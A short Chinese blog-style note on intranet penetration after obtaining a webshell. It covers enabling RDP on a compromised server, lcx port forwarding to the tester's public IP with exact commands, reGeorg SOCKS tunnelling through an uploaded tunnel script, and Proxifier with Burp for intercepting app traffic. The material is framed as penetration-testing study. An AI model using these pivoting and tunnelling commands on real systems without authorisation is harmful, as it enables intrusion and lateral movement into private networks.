浅析内网渗透
关于内网渗透其实方法和思路以及要注意的点内容非常多,又是一个大坑,我就暂且先从三个情况下分别整理一种方法,大概了解一下,先挖个坑哈,手里还有资料但太乱了,之后我再整理吧(真的很多,不是我偷懒,看的眼都晕了,感觉就是一套全新的渗透测试那么多)
前瞻
先回看一下之前的几个小思路吧
Webshell如何开启3389服务
1、通过修改注册表开启远程终端,详情请看: http://blog.sina.com.cn/s/blog_4b92e0c80100gx3x.html
2、通过3389工具开启远程终端
3、数据库可以开
4、上传exe可以开
服务器端口被修改如何查找
注册表读取、
端口扫描、
命令探针查找修改后的端口
外到内渗透连接
拿到webshell,服务器处于内网(没有公网地址)的情况下如何远程连接
1、通过lcx工具解决内网远程连接
把lcx传到远程服务器去
原理就是把目标机端口转发到自己公网IP的端口
Webshell上执行:lcx.exe -slave
自己的公网ip 2222 127.0.0.1 3389
将本机3389端口流量转发到公网ip的2222端口上去
自己的电脑里面执行:lcx.exe -listen 2222 4444
监听本地的2222端口将流量转发到4444
然后连接127.0.0.1 4444
缺陷
可能在公司里实际渗透测试过程中,你是在内网中的,同时你无法操控路由器,没有公网地址
解决就通过下面讲的服务器处于内网远程连接
内到内渗透连接
两台电脑分别在各自的内网怎么连接
通过端口转发脚本解决内网远程连接
通过reDUH
选择对应语言的文件上传
访问一下
通过设置,将本地3389映射到1234上
访问127.0.0.1 1234
内网渗透测试
在上面我们讲到的都是单端口转发,那么如何扩大战果,得到与目标机同一公网下的其他主机的权限呢
环境准备
两台虚拟机
两个网卡
一个处于lan区段1
另一个nat模式映射到公网
方法:需要两个工具结合
reGeorg
把tunnel.php传到服务器
本地执行cmd
reGeorg-master\reGeorgSocksProxy.py -p 9999 -u http://192.168.0.102:8080/tunnel.nosocket.php
让内网之间构成一个通道
Proxifier
代理工具装在本机
设置地址127.0.0.1端口跟上面对应
协议选择
socks协议
各种协议都支持
https协议
web
配置代理规则
本地所有数据包都走socks
通过它转发本地所有流量
补充
关于burp+Proxifier结合抓包
有很多APP现在是防代理的或者黑名单防御,比如微信
但是抓包中间加一个环节使用这个软件 就可以应对了
因为socks是很正规的
方法
在电脑上装模拟器
把burp ca证书丢在模拟器里加载
设置规则 新建规则 让模拟器这个进程所有数据包走socks就可以了
注意 结合使用的工具不要进行拦截 要选择direct模式
访问验证